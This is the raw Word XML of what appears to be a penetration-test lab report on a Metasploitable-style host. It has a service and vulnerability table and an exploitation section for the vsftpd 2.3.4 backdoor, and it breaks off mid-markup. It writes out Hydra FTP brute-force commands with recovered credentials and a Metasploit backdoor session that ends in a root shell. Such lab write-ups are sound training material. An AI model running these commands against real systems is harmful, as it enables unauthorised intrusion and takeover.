        <w:trPr>
          <w:trHeight w:val="437" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1201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22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vAlign w:val="center"/>
            <w:tcW w:w="1402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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3361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OpenSSH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4.7p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="118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5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Susceptible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to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brute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force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="211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8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9" w:name="9"/>
    <w:bookmarkEnd w:id="9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170" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-100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358"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C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201"/>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="3361"/>
        <w:gridCol w:w="3400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="362" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1201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58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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402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14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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3361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03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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="118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89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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="563" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1201" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="52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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="52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Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3361" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="70" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="11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Linux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telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="169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6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Cleartext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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>protocol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59"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—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credentials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  <w:t>exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="684" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="1201" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="127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80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tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="127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3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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="3361" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="150" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="11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Apache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httpd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2.2.8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(PHP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="459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4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE-2012-1823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59"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—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PHP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CGI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injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="597" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1201" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="82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445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shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="82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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3361" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="105" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="11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-6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Samba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smbd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3.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="1272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CVE-2007-2447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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—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usermap_script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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="441" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1201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3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3306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vAlign w:val="center"/>
            <w:tcW w:w="1402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5"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#333333"/>
                <w:spacing w:val="-1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3361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MySQL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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.0.51a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="219" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-20"/>
              <w:jc w:val="center"/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</w:pP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1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>No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root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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>password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59"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—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open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1"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#333333"/>
                <w:spacing w:val="-1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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0" w:after="0" w:line="347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9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52,14923" coordsize="10141,10" o:spt="12" path="m1052,14928l11193,14928">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 56" type="Shape 56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88"/>
        <w:jc w:val="center"/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0" w:name="10"/>
    <w:bookmarkEnd w:id="10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214" w:after="0" w:line="322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83"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4.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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Exploitation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292,1450" coordsize="9901,19" o:spt="12" path="m1292,1460l11193,1460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 72" type="Shape 72" style="position:absolute;left:0;text-align:left;margin-left:63.58pt;width:497.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="332" w:after="0" w:line="268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5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4.1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Port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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="71"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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FTP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1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Service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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(vsftpd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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2.3.4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Backdoor)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4" coordorigin="1052,2045" coordsize="10141,10" o:spt="12" path="m1052,2050l11193,2050">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 114" type="Shape 114" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:29pt;mso-position-vertical-relative:paragraph;z-index:3817" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="332" w:after="0" w:line="268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5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365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32" w:space="0" w:color="E63946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002"/>
        <w:gridCol w:w="3683"/>
        <w:gridCol w:w="3678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="387" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="E63946"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="E63946" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2002" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="6" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="0"/>
              <w:jc w:val="center"/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34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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3683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Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:spacing w:val="2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CVSS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Score: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4A5568"/>
                <w:spacing w:val="1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3678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2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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE: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7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CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="41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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="90" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="497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vsftpd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2.3.4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binary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compromised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backdoor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2011.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When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user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authenticates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username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ending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smiley-face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sequence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,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opens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listener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TCP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port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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6200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granting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unauthenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="9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shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="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access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="368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89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89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Method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42"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1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Hydra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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>FTP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Brute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Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="115" w:after="0" w:line="220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Using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wordlists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of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common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credentials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identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-9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valid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FTP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logins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before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directly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connecting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="318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5" coordorigin="1095,6050" coordsize="9363,3116" o:spt="12" path="m1095,6050l10458,6050l10458,9166l1095,9166">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 445" type="Shape 445" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:157.81pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:-251657458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1" coordorigin="1080,6050" coordsize="29,3116" o:spt="12" path="m1095,6050l1095,9166">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 801" type="Shape 801" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:157.80pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3868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2" coordorigin="1080,6040" coordsize="9373,10" o:spt="12" path="m1080,6045l10453,6045">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 802" type="Shape 802" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3869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3" coordorigin="10453,6040" coordsize="10,3126" o:spt="12" path="m10458,6040l10458,9166">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 803" type="Shape 803" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:158.28pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3872" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="449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6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Step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1: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Brute-force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FTP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credentials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with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Hydra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6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hydra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7346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-L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user.txt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-P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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>pass.txt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192.168.50.3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ftp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="2554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[21][ftp]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host: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192.168.50.3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login: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msfadmin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password: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msfadmin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[21][ftp]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host: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192.168.50.3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login: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user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57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password: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user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4726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Step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2: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Connect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using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discovered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credentials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ftp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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4841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-3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Connected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192.168.50.3.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220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(vsFTPd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2.3.4)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Name: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msfadmin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23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Password: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msfadmin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230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Login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successful.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4" coordorigin="1080,9166" coordsize="9373,10" o:spt="12" path="m1080,9171l10453,9171">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 804" type="Shape 804" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3876" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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10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1" w:name="11"/>
    <w:bookmarkEnd w:id="11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078,1080" coordsize="14,5162" o:spt="12" path="m1085,1080l1085,6242">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 59" type="Shape 59" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:260.08pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3818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095,1078" coordsize="10050,14" o:spt="12" path="m1095,1085l11145,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 60" type="Shape 60" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3820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1143,1080" coordsize="14,5162" o:spt="12" path="m11150,1080l11150,6242">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 61" type="Shape 61" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:260.08pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657490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238.00pt;z-index:3867;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_81y9" o:title="Image120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0,1095" coordsize="10065,5152" o:spt="12" path="m1090,1095l11155,1095l11155,6247l1090,6247">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:259.60pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#F0FAFF" stroked="f">
            <v:fill type="solid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" coordorigin="1095,6240" coordsize="10050,14" o:spt="12" path="m1095,6247l11145,6247">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 62" type="Shape 62" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:1pt;mso-position-vertical-relative:paragraph;z-index:3828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73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Method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42"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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Metasploit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Backdoor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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="32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6" coordorigin="1095,7505" coordsize="9363,5061" o:spt="12" path="m1095,7505l10458,7505l10458,12565l1095,12565">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 96" type="Shape 96" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:255.03pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:-251657480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92" coordorigin="1080,7505" coordsize="29,5061" o:spt="12" path="m1095,7505l1095,12565">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 492" type="Shape 492" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:255.03pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3855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93" coordorigin="1080,7495" coordsize="9373,10" o:spt="12" path="m1080,7500l10453,7500">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 493" type="Shape 493" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3856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94" coordorigin="10453,7495" coordsize="10,5070" o:spt="12" path="m10458,7495l10458,12565">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 494" type="Shape 494" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:255.51pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3859" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="166" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8599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root@kali:~#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msfconsole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8484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search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vsftpd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1" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="586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use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exploit/unix/ftp/vsftpd_234_backdoor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5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2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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>exploit(vsftpd_234_backdoor)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2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2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RHOSTS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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5977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exploit(vsftpd_234_backdoor)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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4494"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="#D4D4D4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192.168.50.3:21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-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Banner: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220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(vsFTPd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2.3.4)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[+]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192.168.50.3:21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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-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Backdoor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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>has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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>been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spawned!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1642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opened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(192.168.50.2:4444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-&gt;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192.168.50.3:6200)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5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Verify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root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access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="848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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9280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whoami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  <w:t>root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id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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uid=0(root)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gid=0(root)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95" coordorigin="1080,12565" coordsize="9373,10" o:spt="12" path="m1080,12570l10453,12570">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 495" type="Shape 495" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3863" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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87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11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2" w:name="12"/>
    <w:bookmarkEnd w:id="12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078,1080" coordsize="14,6890" o:spt="12" path="m1085,1080l1085,7970">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 59" type="Shape 59" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:346.50pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3818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095,1078" coordsize="10050,14" o:spt="12" path="m1095,1085l11145,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 60" type="Shape 60" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3820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1143,1080" coordsize="14,6890" o:spt="12" path="m11150,1080l11150,7970">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
